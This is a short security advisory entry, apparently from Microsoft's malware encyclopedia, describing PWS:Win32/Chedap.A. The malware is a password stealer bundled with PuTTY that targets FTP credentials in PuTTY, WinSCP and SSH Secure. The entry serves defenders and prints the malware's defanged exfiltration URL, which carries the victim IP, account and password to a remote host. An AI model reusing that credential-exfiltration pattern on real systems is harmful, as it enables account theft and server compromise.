Home / malwarePDF  

PWS:Win32/Chedap.A


First posted on 02 February 2012.
Source: Microsoft

Aliases :

There are no other names known for PWS:Win32/Chedap.A.

Explanation :

PWS:Win32/Chedap.A is a password stealer that targets FTP user accounts. The malware has been observed to be packaged with PuTTY; it targets FTP user accounts from a number of open source terminal emulators - including PuTTY, WinSCP and SSH Secure - that are often used by website and/or server administrators to maintain the server.


Top

PWS:Win32/Chedap.A is a password stealer that targets FTP user accounts. The malware has been observed to be packaged with PuTTY; it targets FTP user accounts from a number of open source terminal emulators - including PuTTY, WinSCP and SSH Secure - that are often used by website and/or server administrators to maintain the server.

When the user runs the FTP tool, PWS:Win32/Chedap.A silently records the user's credentials and sends the stolen information to a remote server in the following format:

hxxp://l.ip-163.com:88/yj33/js2.asp?act=add&user=<Victim IP>&pwd=<User Account>&ll1=<Password>=&ll2=22&ll3=<FTP Program name>

Using these stolen credentials, the attacker can easily compromise and control the victim's computer. An attacker can perform any number of different actions on an affected computer using PWS:Win32/Chedap.A. This could include, but is not limited to, the following actions:

  • Download and execute arbitrary files
  • Upload files
  • Spread to other computers using various methods of propagation
  • Log keystrokes or steal sensitive data
  • Use the computer for botnet purposes
  • Modify system settings
  • Run or terminate applications
  • Delete files




Analysis by Tim Liu

Last update 02 February 2012

 

TOP